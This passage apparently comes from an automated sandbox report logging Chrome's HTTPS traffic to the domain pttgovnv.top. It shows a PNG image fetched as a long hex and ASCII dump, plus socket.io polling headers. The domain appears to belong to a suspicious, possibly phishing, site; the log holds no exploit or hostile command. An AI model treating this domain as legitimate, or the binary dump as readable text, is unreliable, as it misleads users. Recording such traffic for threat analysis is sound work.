          Data Ascii: PNGIHDRq[pHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<8uIDATx=V=sMD&"4WX9XEHdY`Px#wUY_s4*u~]Bq8@ B!8
          2024-09-01 22:25:25 UTC1369INData Raw: 1f a6 14 0a 5e f3 e7 97 45 92 fe 91 04 72 38 4f e9 63 61 fe 7d f1 bf ff f6 9f 02 2c af fd f4 8f be 79 ec ef f8 f1 79 fa 58 a6 ef 63 d9 e0 71 16 2a f7 f4 18 17 5c 0d 00 21 0e e1 04 39 69 91 3b 35 ff b5 4a 1f d3 ec 71 fc c0 97 35 a4 92 97 a0 3f 49 1f 07 81 1f ea ad 09 76 12 88 e6 4d 06 bb b4 cc c6 e9 1f a3 f4 b1 57 f2 57 af e5 f7 7c 1c bb 09 6f f2 b9 9e 95 fc 55 f9 8e 18 a7 c7 38 e1 ea 00 08 71 68 3e c4 ed 9b ca ef e0 95 2f eb b9 79 2c d2 50 37 a7 b0 3a 19 e0 be 46 7a f8 b7 e6 86 64 e6 33 d0 a5 65 36 ad 10 8c d6 dd a7 8f c4 e5 31 9b 00 27 d7 f3 51 8d a7 b9 4c 8f 71 c4 55 02 10 e2 d0 7c 90 eb 9b 2f f5 5d 2d 07 d2 ed ba 34 3f bb cc 1e 84 bb 36 87 b8 a5 0a bf 05 ae 08 69 e1 9a b8 ee 0a b4 18 7a af d3 63 1d 06 1c 34 73 ef d3 e3 e4 fa 07 08 71 08 20 c8 49 a5 71
          Data Ascii: ^Er8Oca},yyXcq*\!9i;5Jq5?IvMWW|oU8qh>/y,P7:Fzd3e61'QLqU|/]-4?6izc4sq Iq
          2024-09-01 22:25:25 UTC1369INData Raw: 26 a4 db 62 75 4c 5c 81 e3 df cf c2 b6 dd b1 92 8f e9 7b e8 6d 79 cd 26 bf 30 e5 5c 94 f2 9d a4 c7 f8 b4 e5 18 13 73 e3 d5 84 7b 73 fd 4f 7d 9e 0b 40 57 d1 12 87 17 7a e2 41 a2 ea 75 55 ed 99 f0 76 52 f0 67 e7 b5 77 55 d0 5d b9 43 a5 c7 e5 d9 de de eb 44 e9 56 39 ba d9 02 63 82 4c 62 f9 69 0f cc 84 8a 10 9d 98 d0 bd 08 78 26 ed 91 b9 99 fa 96 1e e3 94 b3 14 20 c4 c1 6f 90 5b 58 08 72 65 43 df d4 d2 b1 e7 61 4e 2a e1 4f 96 8f f1 ab 99 89 8b b0 82 dc c2 f2 67 ad cc f9 13 b2 03 6b d7 8c 5b 67 a6 b5 17 00 21 0e 0d 04 b9 6d 63 8e e4 ef 6c 4d 2e 38 b1 3a fe 4c cf 98 95 ca 23 6f 99 b3 e5 dc 8c e5 63 d2 43 58 41 4e 3e 6b 9b b3 96 93 08 de f6 51 1a 90 86 11 1c e7 88 19 bf 00 21 0e e1 05 39 e9 36 91 96 af 77 4a cf 16 95 9d 16 2e 4d b0 2b 5a a1 e6 41 f0 93 d2 63 9b
          Data Ascii: &buL\{my&0\s{sO}@WzAuUvRgwU]CDV9cLbix& o[XreCaN*Ogk[g!mclM.8:L#ocCXAN>kQ!96wJ.M+ZAc
          2024-09-01 22:25:25 UTC1369INData Raw: 7f 23 e1 74 11 f4 f2 21 55 c3 2b dd a2 4d 5d 3f 7d 19 7a 60 6e 80 7e a8 d7 d7 2f b4 85 cf 18 40 54 e8 4e 75 5b 01 0d 95 9b 71 6f bb 0c 94 eb b5 ae f4 18 b6 24 db 85 e1 d7 f7 98 2f 1f 22 01 6f d8 a2 81 fd f2 1e 9b 59 b7 2f 9e f3 fd 39 e2 c3 bf 66 26 25 80 d8 d0 12 e7 a6 32 93 f5 de e6 4a 8f a3 da 6b e0 10 fc b5 84 c9 a4 07 1d 56 64 49 81 f5 2e c7 97 e5 43 62 d8 37 b5 58 68 bd 2f f9 5b 07 5c 0d 51 90 f3 76 4c 31 00 20 c4 75 3b bc ad 8f d9 39 69 f0 50 8e cc fa 59 be 02 ce 53 b6 14 89 ee 62 bd 5e 0b 73 7a f9 10 bd 43 43 1b c2 dc 8c b3 bc 95 26 4c 68 00 40 88 eb 6e 78 cb c7 bd 49 17 e6 59 20 87 e5 7f 5c 9a b4 56 e9 05 82 25 40 4a cb dc e3 1b 61 ae 17 e9 47 5d 36 c4 dd 72 75 04 4f ce 51 26 34 00 20 c4 75 34 c0 0d 4d 78 7b 6b af d0 a6 0c 1b 7b e5 bc 65 ee f8 41
          Data Ascii: #t!U+M]?}z`n~/@TNu[qo$/"oY/9f&%2JkVdI.Cb7Xh/[\QvL1 u;9iPYSb^szCC&Lh@nxIY \V%@JaG]6ruOQ&4 u4Mx{k{eA
          2024-09-01 22:25:25 UTC1369INData Raw: db 1b f5 27 d3 75 5d 66 8b 37 e9 b2 1d 53 e8 00 00 42 dc 8e 10 64 96 48 b8 b6 f0 74 b2 4f a9 f7 6e 4a 13 e4 86 aa 5a f7 f0 99 d9 4b 16 ee 94 2d 5f d7 9b b7 27 7c 24 d8 81 2d df 00 42 5c 54 61 4e 42 90 8d 25 48 4e d3 c7 dc f7 a6 f3 35 c7 f9 9d 37 bc 64 4a 6b 99 72 2d b3 a6 df 25 93 19 5a cf d5 4d 9e cd ee f7 3d 3e 26 80 10 17 5b 90 9b 2a 3b 4b 90 48 a5 bd f0 bd 81 79 cd 20 77 45 90 b3 1e e0 a4 b2 2e d3 0a 77 6f 26 ab a0 dd 5c 7d 2f 3c 39 38 7f 01 10 e2 a2 0a 72 f9 84 87 ba e3 e4 e4 4e f6 bb ef 60 44 90 0b ca 58 15 6f d1 90 cf 8b b2 0f 97 cd ad c5 7a 1d 0f 9b 00 08 71 4e 83 50 3e 4e ee 93 85 a7 93 60 34 f5 79 57 4b 90 6b 9e 99 cc 50 66 8f db 11 b3 51 3b c3 55 38 5a 44 72 9c 00 08 71 5e c2 d0 38 fd e3 bd d2 b3 05 eb 38 53 9e c7 c9 d5 5c 42 e5 8a c9 0e b5 02
          Data Ascii: 'u]f7SBdHtOnJZK-_'|$-B\TaNB%HN57dJkr-%ZM=>&[*;KHy wE.wo&\}/<98rN`DXozqNP>N`4yWKkPfQ;U8ZDrq^88S\B
          2024-09-01 22:25:25 UTC1369INData Raw: 38 e5 bb c0 f7 ac 5a 42 1c 40 88 c3 46 40 aa 32 08 ff da 84 91 45 43 c7 3b b0 19 1e 1c 93 f0 3b 53 2d 5c eb 8a 10 d7 9a 20 57 3a c4 35 14 e4 08 71 00 21 0e 16 03 9d f7 71 73 6b c7 2b 2d 8a c9 da 23 a4 6e d7 3c b8 4d db bc b6 15 21 ce 79 90 93 73 c8 47 eb 73 a5 10 67 8e 53 42 95 af 85 80 09 71 00 21 0e 05 03 5d 62 42 5d 91 31 74 f9 f6 3e 8d 85 96 b5 50 d7 5f fb d3 57 4b 86 84 b6 b9 7a 59 e2 64 d9 91 f3 84 10 e7 fe 9c 9e 2a f7 b3 56 2b 87 38 73 9c 65 b7 91 23 c4 01 84 38 78 ac 4c 06 aa 78 8b d7 bd f9 42 9f 35 1d 66 d6 66 94 ca 23 0f 79 aa 46 c0 bb 35 7f 4a 50 5d aa 97 e5 4b 9e 3a 7a 5e c8 e7 6c ad 3b 8d 10 f7 66 39 cb 98 d0 b1 c3 90 54 2b c4 79 0c 9c 84 38 80 10 87 9a 5f d6 3d f5 6b 37 e6 b6 ee 1e 59 bc 76 66 02 dd 53 c0 ef a7 b7 25 58 cc f9 d4 b7 86 0b 5b
          Data Ascii: 8ZB@F@2EC;;S-\ W:5q!qsk+-#n<M!ysGsgSBq!]bB]1t>P_WKzYd*V+8se#8xLxB5ff#yF5JP]K:z^l;f9T+y8_=k7YvfS%X[
          2024-09-01 22:25:25 UTC1369INData Raw: 70 c7 0f c3 48 3f bf 7d 53 31 0f 2b dc f9 bb d6 5c cb c9 dd e1 ac 42 a5 b4 ca 5a 24 76 1d ab 0e 44 53 cb 21 59 6e 22 c6 56 2b 69 7d 6e 8c cc b9 71 e0 b8 c4 6f cd f1 cf 3d 5d eb f2 59 f5 bd 77 43 ea 1b a5 a1 a7 32 dd 16 9c a7 b6 af a9 34 cc 8d d3 3f 2e a8 fe bd 05 b9 1e 2d 72 84 b8 76 86 38 02 5c 99 0a 7a a4 9a 69 71 ab 12 52 fc b4 74 de 1d 4a 99 7c 76 72 3e b8 3f 37 3f a5 af 3f 8e f8 dc b8 35 9f 73 d1 16 cd 3a df 3f 37 e9 eb 0c 3c 86 37 f9 5c ce 02 b9 9e 24 04 cc 6c 07 ff 34 c8 f9 fc ee ed ba eb 34 c4 0d 29 06 42 5c bb 42 9c ee a2 98 7b aa 7c e2 0b 70 f1 85 b7 cd 8a 47 2a 9d 89 e3 f2 59 d6 2c 9b bf 5e ad 18 fd dd 5c 54 1f 9b a9 5b 09 a5 7c 0f 1a fe ac 8b 85 d1 bb 43 b9 d6 4f ac 7f 56 ed 0d 6f af b9 34 d7 95 95 1b 24 82 9c 37 8f 69 88 eb 51 0c 6e b0 c4 48
          Data Ascii: pH?}S1+\BZ$vDS!Yn"V+i}nqo=]YwC24?.-rv8\ziqRtJ|vr>?7??5s:?7<7\$l44)B\B{|pG*Y,^\T[|COVo4$7iQnH
          2024-09-01 22:25:25 UTC1369INData Raw: 7f 2b bd 95 d1 ed 1b 41 e0 93 fa 7d 52 8e cb 9b 90 8f 59 eb 4f dd 00 f7 eb fb 95 e3 0d 71 df cd 91 a3 40 24 a1 bb 67 25 c0 fd 5a 96 33 13 fe 5d 2c b4 7b 50 e7 bc 32 0b d5 86 ba 00 30 63 6b 41 88 6b 49 80 cb cd 22 08 06 b6 8e cf 4f 80 7b a9 68 e4 73 b6 dd 85 d6 0f fc b3 fa 90 75 39 56 2b af 85 09 7e 12 d4 de 29 59 88 5a 3f fe 4e ff 7b df 74 65 3e ad 5d 47 45 5b ef aa be 8f 89 c3 f3 22 9c 20 a7 af 7f 17 61 f8 de 84 ee 27 47 e5 b8 70 18 e4 46 35 bf 17 43 dd 36 6a f8 e7 97 45 1c c3 68 40 88 0b 58 48 eb 2f e5 83 79 43 66 23 b8 dc ab 66 ba 8e 6d 7f 99 27 01 7f 4e 1f ad 8e 31 94 d6 1b fd 78 6b 02 8e ab 40 7e e9 7c 17 93 b0 82 9c 8b 56 b8 95 d3 00 f7 52 8e f9 8e 09 2b cb cf bc 57 f3 fb 62 e6 e0 98 6c bd af 39 41 ae db 18 13 d7 3e a7 d9 a0 e6 70 b7 df 5a aa fa 03
          Data Ascii: +A}RYOq@$g%Z3],{P20ckAkI"O{hsu9V+~)YZ?N{te>]GE[" a'GpF5C6jEh@XH/yCf#fm'N1xk@~|VR+Wbl9A>pZ
          2024-09-01 22:25:25 UTC1369INData Raw: b0 1d e2 ba 57 f1 d9 5f ff 31 d4 9b ba 90 26 37 2c 1d be cf c7 34 c0 4d 14 40 88 0b 22 c0 25 a5 03 dc 4b 90 9b 28 f7 0b 4b ca 6e 0e e3 e0 4a 4e cf 1c 95 2f ed ef aa db 33 46 63 ad 20 01 54 c3 a2 b6 20 c4 05 14 e0 ea 56 8e 43 0f c7 7a 11 cc 6e 0e 7a ad 36 b9 cb bd 22 b8 79 c5 58 32 80 6b 11 84 38 58 0c 70 79 b7 ea 27 0f c7 3c 35 4b 71 34 15 de 7a d9 f8 3c dd 5d ca 6c d2 ee a0 05 10 f8 d5 3e 45 00 42 5c 1b 02 dc 4b 90 1b 2b 3d bd de 25 09 4e cd 8c c3 d0 8b 0f 87 be 95 8d 7c ae b2 10 f3 87 f4 f1 0f a7 b9 35 b4 3a 00 bf 62 31 76 10 e2 5a 13 e0 5e 0c 3d 1c ff 99 f7 dd 1c f4 52 2a d2 fa 16 e2 e2 bb 32 1e 51 5a 41 df a7 9f a9 cc 64 1b 98 f1 8d 6d 0c 1e 6d 69 11 eb 2b 20 6e 07 7f 7e 59 10 e4 40 88 f3 ec de 61 80 cb 17 62 6d 57 b7 aa fb 45 8d cb 06 f0 f5 d0 f6 2e
          Data Ascii: W_1&7,4M@"%K(KnJN/3Fc T VCznz6"yX2k8Xpy'<5Kq4z<]l>EB\K+=%N|5:b1vZ^=R*2QZAdmmi+ n~Y@abmWE.
          2024-09-01 22:25:25 UTC1369INData Raw: 10 87 a2 77 e3 9f 22 ae 30 c2 09 aa 3a c0 cd 95 6e 8d 20 c4 b9 3f 77 a5 a2 7d 74 f4 ec 12 44 16 d6 6e 00 e4 79 ee 0e e7 ca cd 7e c0 75 ca 50 8e c9 45 8b e6 67 d3 e2 e8 3a c0 b9 68 f1 be ad 33 ae cf 74 a5 d6 3d ae 19 17 38 08 71 28 fa 45 2e ad 03 f7 1e 5e e9 a4 e0 17 bb ed 63 71 bf 0e d8 4b 80 73 3d 50 fd a8 e1 35 cd 42 33 76 5a d6 4a fd c8 5a cf aa 86 39 1d de a6 d9 f3 84 bb 66 98 ab 32 bc 4a df fb c4 c9 b5 e6 2e c0 d9 28 8f 01 97 25 08 71 f0 6d e8 e9 75 26 05 42 88 ed d9 97 7b 4e ef 6c 75 37 b1 8f 00 97 4b 38 5d 7f de 80 4c 3d dc 80 5c 98 30 37 cb 6e 42 76 9d bf 3a 64 0c b3 9f d7 e1 ed 2c f0 32 94 73 f7 da d1 b3 9f 9b 16 cd be a5 6b 2d 31 d7 9a ab 32 bd b6 30 bb d6 46 57 32 37 6a 70 82 d9 a9 ed ad 0c e5 8b f6 93 72 df dd 93 2f ac ba ed 6e d7 c5 97 f4 89
          Data Ascii: w"0:n ?w}tDny~uPEg:h3t=8q(E.^cqKs=P5B3vZJZ9f2J.(%qmu&B{Nlu7K8]L=\07nBv:d,2sk-120FW27jpr/n


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          69192.168.2.449812104.21.47.250443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:25 UTC361OUTGET /help/layout/images/35.png HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          Accept: */*
          Sec-Fetch-Site: none
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: empty
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:25 UTC724INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:25 GMT
          Content-Type: image/png
          Content-Length: 10360
          Connection: close
          Access-Control-Allow-Origin: *
          Cache-Control: public, max-age=86400
          Last-Modified: Wed, 29 May 2024 10:14:36 GMT
          ETag: W/"2878-18fc3d82ee0"
          CF-Cache-Status: HIT
          Age: 36234
          Accept-Ranges: bytes
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TXgksDwinkJ2W92LeuJc7gKsFMQXjvlwgxRcTlIhA990rDuTdFkAN9a8NJnxfIAk7KQ4fNeARHi%2BuNK1hL9n419sblvrSZtrKZ%2Fm7JI2sfNo3%2BtajYbuoUMqIOLV98g%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad17ce7543fd-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:25 UTC645INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 71 00 00 01 a1 08 06 00 00 00 0e 5b e2 8a 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 28 05 49 44 41 54 78 da ec dd 4d 7a d3 58 fa 37 60 c1 d5 f3 d0 2b 20 bd 82 a4 a6 ff 09 ae 15 90 1e f5 10 b3 02 52 2b c0 ac a0 c2 0a 30 c3 1a 11 56 80 99 bc d3 4a 56 50 66 05 0d 2b e0 f5 43 1e 75 a9 5c f9 b0 ec 23 5b b2 ef fb ba 7c d1 5d 10 47 96 e4 73 7e 3a 9f 8f be 7f ff 5e 01 00 30 2c 8f 9d 02 00 00 21 0e 00 00 21 0e 00 00 21 0e 00 40 88 03 00 40 88 03 00 40 88 03 00 10 e2 00 00 10 e2 00 00 10 e2 00 00 84 38 00 00 84 38 00 00 84 38 00 00 84 38 00 00 21 0e 00 00 21 0e 00 00 21 0e
          Data Ascii: PNGIHDRq[pHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<(IDATxMzX7`+ R+0VJVPf+Cu\#[|]Gs~:^0,!!!@@@8888!!!
          2024-09-01 22:25:25 UTC1369INData Raw: 84 38 00 00 84 38 00 00 21 0e 00 00 21 0e 00 00 21 0e 00 40 88 03 00 40 88 03 00 40 88 03 00 40 88 03 00 10 e2 00 00 10 e2 00 00 10 e2 00 00 84 38 00 00 84 38 00 00 84 38 00 00 21 0e 00 00 21 0e 00 00 21 0e 00 40 88 03 00 40 88 03 00 40 88 03 00 40 88 03 00 10 e2 00 00 10 e2 00 00 10 e2 00 00 84 38 00 00 84 38 00 00 84 38 00 00 21 0e 00 00 21 0e 00 00 21 0e 00 40 88 03 00 40 88 03 00 40 88 03 00 40 88 03 00 10 e2 00 00 10 e2 00 00 10 e2 00 00 84 38 00 00 84 38 00 00 84 38 00 00 21 0e 00 00 21 0e 00 00 21 0e 00 00 21 2e 7c ff 7f 27 a3 c5 6b e2 4c 00 00 43 f1 e8 fb f7 ef ce c2 4d 90 bb 5c fc 71 bc 78 9d 3f fa bf eb 99 33 b2 47 37 f9 6f d7 71 5d c7 8b d7 68 47 87 50 df 4f f3 78 7d ff cf c9 6c 87 e7 62 94 e7 e1 a1 73 71 15 c7 bd 38 d6 cb 2d 5c 9b b3 3c 9e 27
          Data Ascii: 88!!!@@@@888!!!@@@@888!!!@@@@888!!!!.|'kLCM\qx?3G7oq]hGPOx}lbsq8-\<'
          2024-09-01 22:25:25 UTC1369INData Raw: 0c 69 b2 cb 0c ec 90 96 b8 f2 05 69 3c 95 9e 66 40 9a 54 7f 5d a4 b0 d9 1a 36 c9 7f fb d0 fb 4d ab 3f 5b e7 e2 fd 62 fb 91 12 ad 73 71 5c 31 19 63 92 c7 32 75 f5 6e f5 73 a1 f7 39 cd 57 a9 eb f7 97 6b f9 e8 b7 eb f1 f7 ff 9c b8 86 fc ed e1 b2 fa b3 85 3f 1e 20 a3 b7 a0 64 eb 5c dc cb f1 be 5a f6 41 88 eb af 0c 3b 97 39 a1 61 95 c2 b3 2e 38 e3 e7 ce 97 2a ee 68 0d fb d4 32 cc cd 17 7f 8c 1b fb 37 2e 07 c4 12 61 6e bc ca b1 1c d4 75 ff cf 49 a9 f3 f1 bf f7 89 c0 55 f0 fa d5 ce 2a b3 55 59 ed 01 73 5a fd 75 d8 c7 a6 84 38 d8 11 dd a9 ab 8b f0 f6 7b 6e 83 55 ef 9a 30 5a a1 e0 8c ca fa b8 ba d9 6f 75 59 1d e6 56 de ce a6 b1 a0 70 bc 67 4c a8 28 d5 4d f2 b4 71 2c c7 2e 77 a7 c1 30 2a d1 b8 de 6f 0b be ed 73 13 1c 58 b1 0c 89 87 88 92 13 a8 2c 35 02 3b a2 25 6e
          Data Ascii: ii<f@T]6M?[bsq\1c2uns9Wk? d\ZA;9a.8*h27.anuIU*UYsZu8{nU0ZouYVpgL(Mq,.w0*osX,5;%n
          2024-09-01 22:25:25 UTC1369INData Raw: d3 e5 1e 91 fc ff 57 d5 6e bb 9f 5f 17 0c b8 fb 14 e0 42 b1 1e ac bd 0e 71 b1 52 fd e2 35 bf a5 50 38 5d f3 e2 9d e7 be a9 93 87 f6 4d 6d 74 57 fe 5c dd cc 72 5a 7e 4a b9 e8 53 0b d6 86 41 ee d5 2a fb c8 b2 95 2f b7 69 ff ac e2 bc 50 50 fa 5c 62 b6 5d 23 74 0c 75 0b af 4d 83 dc f1 86 bf ff 78 e9 5c ce 7a 12 84 5f dc d7 dd 7b a0 01 ee 47 f0 16 e2 ee 0f 6f b1 cf 63 dc c4 9f ee 38 59 6b dd dc 8b c2 ea 22 2b c9 08 85 31 88 f3 7b 76 91 4e 33 e0 8d 96 83 59 4c 22 c8 cd ea df 2c 05 a4 68 e2 ee d5 98 b2 0c 72 e3 35 7f dc 22 aa 9b df b7 a7 9b 16 bc 3d 5c ff ec ba 87 a7 fa a0 83 6e 63 79 89 12 a6 85 8e 67 56 b2 62 1b 60 60 d9 34 c4 9d f6 30 c0 d5 7e dd 87 87 fc 82 01 ee c7 c3 8f 10 77 7b 25 18 e3 de 22 4c fc f1 d0 13 5d 9b cd b3 97 82 4e 5c c8 66 37 69 34 57 47 37
          Data Ascii: Wn_BqR5P8]MmtW\rZ~JSA*/iPP\b]#tuMx\z_{Goc8Yk"+1{vN3YL",hr5"=\ncygVb``40~w{%"L]N\f7i4WG7
          2024-09-01 22:25:25 UTC1369INData Raw: 0a 68 be c1 cf 6e a5 bc cc b1 63 df 36 7d 9f 1d ae 9b d9 45 d8 bd 2c 71 4e 0a 04 f9 2e ea b6 92 01 ee fd b6 02 5c 2f 42 5c 6e 95 15 4f 3d b1 9b c1 2e 36 3f 3e db 56 a1 d0 08 73 f5 22 c1 11 56 df e5 36 5d 93 9e 2f 94 7b 59 fa ba ab 2b 37 f6 d6 58 38 3a 10 bd 20 7f c4 a0 f6 2e 96 42 c9 96 fd 75 b6 88 7b d3 e5 d8 a2 5b 94 f8 5d bb 2a d3 c7 1d 5c b7 af d5 9e cd 82 8f ad 31 4b 07 b8 08 cf db 1c 2e b5 d3 10 97 4b 2c c4 17 fa c5 0e 0f e3 69 c1 c1 eb ab 86 b9 f8 82 fd 73 f1 7a 59 dd 74 53 1e 35 0a ce 98 e5 7a de b7 40 d7 b2 e0 5d a5 f0 b3 24 c6 66 e2 5a 4c 9c 06 3a 14 83 fb 3f 75 d4 63 30 6d f9 ef af 73 3b c0 6d 1a ea 1e bb ef 3b 0c bb a5 1e 1a 47 bb 3e 49 19 e0 5e 14 3e ef e3 6d 7f 8e 9d 84 b8 dc 2a 6b 5e 95 1f f7 f6 79 cd 9f db fa 89 cf 31 73 d1 65 71 96 81 ee
          Data Ascii: hnc6}E,qN.\/B\nO=.6?>Vs"V6]/{Y+7X8: .Bu{[]*\1K.K,iszYtS5z@]$fZL:?uc0ms;m;G>I^>m*k^y1seq
          2024-09-01 22:25:25 UTC1369INData Raw: e3 5d 67 c0 fc d4 7d f9 f7 1b b5 59 f8 af 3a a5 3d d7 e0 5b b5 60 fe 26 3c c3 76 e4 77 b8 64 c5 d3 ba ac cd 35 db a2 61 e0 83 00 c7 80 4d b6 bd c7 f9 da 8b fd 16 0a 72 ef 72 cc 5a e7 b2 eb ea 4d db c0 12 5d 7b ee cb 5b bd 69 39 13 ad cd 75 b6 0d 17 6c 57 c9 07 d6 56 21 2e 57 d2 ef d3 56 4e d7 59 57 bc 74 5b d0 d2 51 b5 e5 c5 eb 37 da b1 61 80 41 2e 02 d9 c7 96 3f f6 3a 07 e4 1f bc c6 13 c6 e7 36 33 71 72 22 cc aa 63 6e be 98 19 0c db 95 dd 9f d7 85 de 6e e5 f2 72 51 a6 44 85 f7 ae da ed 1a 6e 31 2c e4 7d 86 b6 7f 2d ce c5 69 96 6f 73 77 06 6b 78 9e c3 02 fa 1f e2 96 82 dc e7 21 04 b9 ea a6 45 a8 6d 61 75 99 8b 19 1f ba e3 3c 77 6d 6f d0 f3 8e fe 2d 50 ce ac 54 6b c4 2a db 11 e5 cc d8 57 3b f8 9c 51 86 bd 6d 84 b6 18 c3 f7 63 56 ed ba 63 f9 18 bc 58 e2 e9
          Data Ascii: ]g}Y:=[`&<vwd5aMrrZM]{[i9ulWV!.WVNYWt[Q7aA.?:63qr"cnnrQDn1,}-ioswkx!Emau<wmo-PTk*W;QmcVcX
          2024-09-01 22:25:25 UTC1369INData Raw: 0c 4b 75 17 6b db 85 f6 ea 56 b9 59 57 a1 a9 b1 54 4a 9b 63 8b 80 19 ad 72 93 7d ea 62 cd c0 3c ab 1e ee 42 8d 49 0c 02 5c 3f be 5f d3 aa 5c 97 c0 c9 a6 c1 29 ef 89 f7 85 8e e7 a8 ea 78 d2 d3 1e 84 b7 b3 c5 2b 82 f3 ef 55 77 33 2f ef 6a ad 28 b5 94 50 d7 dd 9c ab 94 69 6d bf 27 ec 8f 71 c1 f7 9a ee 5d 88 6b 14 ee b3 6c f9 7a b9 46 f2 7d 56 87 a6 8e 8e ed 2a 8f ed 97 aa dd 58 b9 78 ea 9d ef 43 98 8b 31 7f 11 98 57 28 ec de 98 85 da 3b 25 67 47 45 05 f5 7b ae e1 78 da 83 e3 a9 27 3d 45 98 1b 1f f2 6c f1 68 51 8a 27 fd e8 1a 8c e0 b6 78 7d cd ef ec f3 0e 7f 6d 94 87 97 77 b4 62 94 7a 88 3b 2f 39 9e 68 e9 9c 4d bb 08 5d 03 1c 0f c8 5d 75 df ff 5d 47 c8 2f 35 2c a5 c8 96 5c ff 18 40 cb c1 34 d7 1e 8b 0f bb ea 38 85 1f a1 29 7f ee 3c c7 b5 95 3e b6 8b 5c 1f 2e
          Data Ascii: KukVYWTJcr}b<BI\?_\)x+Uw3/j(Pim'q]klzF}V*XxC1W(;%gGE{x'=ElhQ'x}mwbz;/9hM]]u]G/5,\@48)<>\.
          2024-09-01 22:25:25 UTC1369INData Raw: 6e c7 19 30 e7 15 07 11 e4 22 ac f7 29 38 c5 fd 97 0f 5d bd 08 4e 19 5c 0e 75 fd c3 eb 66 b0 29 74 2e c7 3d 0c c5 71 ff 9f de 32 db b6 eb 63 bd ea c9 7b ac 72 ed ae 0a 9c 8b ab 2d 7f b6 d9 16 ce c9 9b 0d df 66 ad ba f6 d1 f7 ef df d5 60 d5 5f 66 68 c6 13 e2 b3 07 d2 f2 34 5e db 0c 38 39 4e e8 38 8f b1 39 39 61 9d b1 4c 9f ab 3f 27 42 fc 78 ed 5b 58 cb f3 f5 47 81 20 f1 e8 00 bf 0b f1 1d b8 a8 ca 2e 1c fb 39 97 df 59 f7 5a 4e ab f2 33 0c 7f aa 27 ff ac 7c 3f dc 2c 65 11 df 95 a3 03 b9 1d a2 bc 9b ac 33 6b 6e c5 f3 79 9c c1 78 d7 63 32 a3 4c 3c bf 6f cc 5a 6e 9f f5 69 83 df f1 f3 7d 4b b1 e4 be b6 eb 8e b9 fc 9c 5d bf db 79 c0 ba d9 a2 6c dd 71 ab d7 8b 63 3d 6d f9 fb 22 44 6f 32 ee ec 9f 05 b7 7e bb ef 38 af 36 b8 97 7f 59 61 c1 6c 21 ae 65 45 36 ca d7 c9
          Data Ascii: n0")8]N\uf)t.=q2c{r-f`_fh4^89N899aL?'Bx[XG .9YZN3'|?,e3knyxc2L<oZni}K]ylqc=m"Do2~86Yal!eE6
          2024-09-01 22:25:25 UTC132INData Raw: 80 10 07 00 20 c4 01 00 20 c4 01 00 20 c4 01 00 20 c4 01 00 08 71 00 00 08 71 00 00 08 71 00 00 42 1c 00 00 42 1c 00 00 42 1c 00 80 10 07 00 80 10 07 00 80 10 07 00 20 c4 01 00 20 c4 01 00 20 c4 01 00 20 c4 01 00 08 71 00 00 08 71 00 00 08 71 00 00 42 1c 00 00 42 1c 00 00 42 1c 00 80 10 07 00 80 10 07 00 80 10 07 00 40 f5 ff 05 18 00 7b d5 9d 19 fe e3 fe 6b 00 00 00 00 49 45 4e 44 ae 42 60 82
          Data Ascii: qqqBBB qqqBBB@{kIENDB`


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          70192.168.2.449813172.67.174.217443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:25 UTC554OUTGET /socket.io/?EIO=4&transport=polling&t=P6liMOa HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
          Accept: */*
          sec-ch-ua-mobile: ?0
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          sec-ch-ua-platform: "Windows"
          Sec-Fetch-Site: same-origin
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: empty
          Referer: https://pttgovnv.top/help/
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:26 UTC623INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:26 GMT
          Content-Type: text/plain; charset=UTF-8
          Content-Length: 118
          Connection: close
          Access-Control-Allow-Origin: *
          cache-control: no-store
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g2hZjSpzVUtySij0pOiOxl0ZiVIpMu7H2Htd0Pk48xjr2cu4u2ReEdxppKe2T%2BLq0qE8Kn3RANVxa3a%2Bmf99SL1lGcg7a3Vgi9PqWvULCSLrH%2Fm5gySYEo33%2BRdOxX4%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad19d90c42bc-EWR
          alt-svc: h3=":443"; ma=86400
